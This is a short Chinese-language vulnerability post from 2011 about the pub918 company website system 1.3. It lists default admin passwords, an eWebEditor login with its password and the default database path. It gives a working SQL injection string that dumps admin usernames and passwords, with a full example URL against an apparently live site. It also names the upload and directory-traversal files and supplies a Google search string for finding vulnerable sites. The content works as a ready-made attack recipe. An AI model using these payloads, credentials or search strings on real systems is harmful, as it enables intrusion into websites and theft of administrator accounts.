pub918软件公司网站系统1.3 存在多处漏洞

发布日期：2011-04.16
发布作者：Mr.DzY

漏洞类型：文件上传、信息泄露

漏洞描述：pub918软件公司网站系统是一个很漂亮的企业型网站，其中很多公司都存在同样的问题。

后台用户名密码admin
后台：admin/
默认数据库：admin/db/N%23%23ews.mdb

1、ewebeditor 问题。
路径：
admin/webedit/admin_login.asp
帐号密码：
admin
29767143
利用：略。你懂的。

2、注入漏洞：
漏洞文件：new.asp
查询语句：union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin
利用：随便打开一个新闻在后面加上查询语句即可爆出管理帐号密码。如：
http://www.7747.net/new.asp?id=62 union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin

3、遍历目录：
ewebeditor 遍历漏洞。
漏洞文件：
Admin_UploadFile1.asp
Admin_UploadFile.asp
利用：略。你懂的。

google
inurl:download.asp

标签分类：